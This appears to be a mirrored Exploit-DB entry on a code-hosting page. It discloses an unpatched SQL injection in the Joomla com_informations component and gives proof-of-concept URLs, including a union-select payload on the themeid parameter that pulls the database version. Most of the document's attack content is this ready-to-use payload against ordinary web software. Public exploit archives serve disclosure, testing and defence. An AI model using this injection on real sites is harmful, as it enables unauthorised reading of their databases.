bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/37774.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

27 lines
No EOL
776 B
Text
Raw Blame History

# Exploit Title: Joomla com_informations component SQL Injection vulnerability
# Date: 13-08-2015
# Software Link: N/A
# Exploit Author: Omar AbuHassan
# Contact: https://www.linkedin.com/pub/omar-abu-hassan/bb/600/960
# CVE: N/A
# Category: webapps
# Version: All
# Tested on: Kali linux (x64) / Windows 8.1 pro (x64)
1. Description
Normal user can inject sql query in the url which lead to read data from the database.
2. Proof of Concept
http://[target]/index.php?option=com_informations&view=sousthemes&themeid=-3 (SQLI)
Injected column is # 3
http://[target]//index.php?option=com_informations&view=sousthemes&themeid=999.9+union+select+111,222,version()%23
** No solution yet from vendor **
#######################
# Greets to Palestine #
#######################
Reference in a new issue View git blame Copy permalink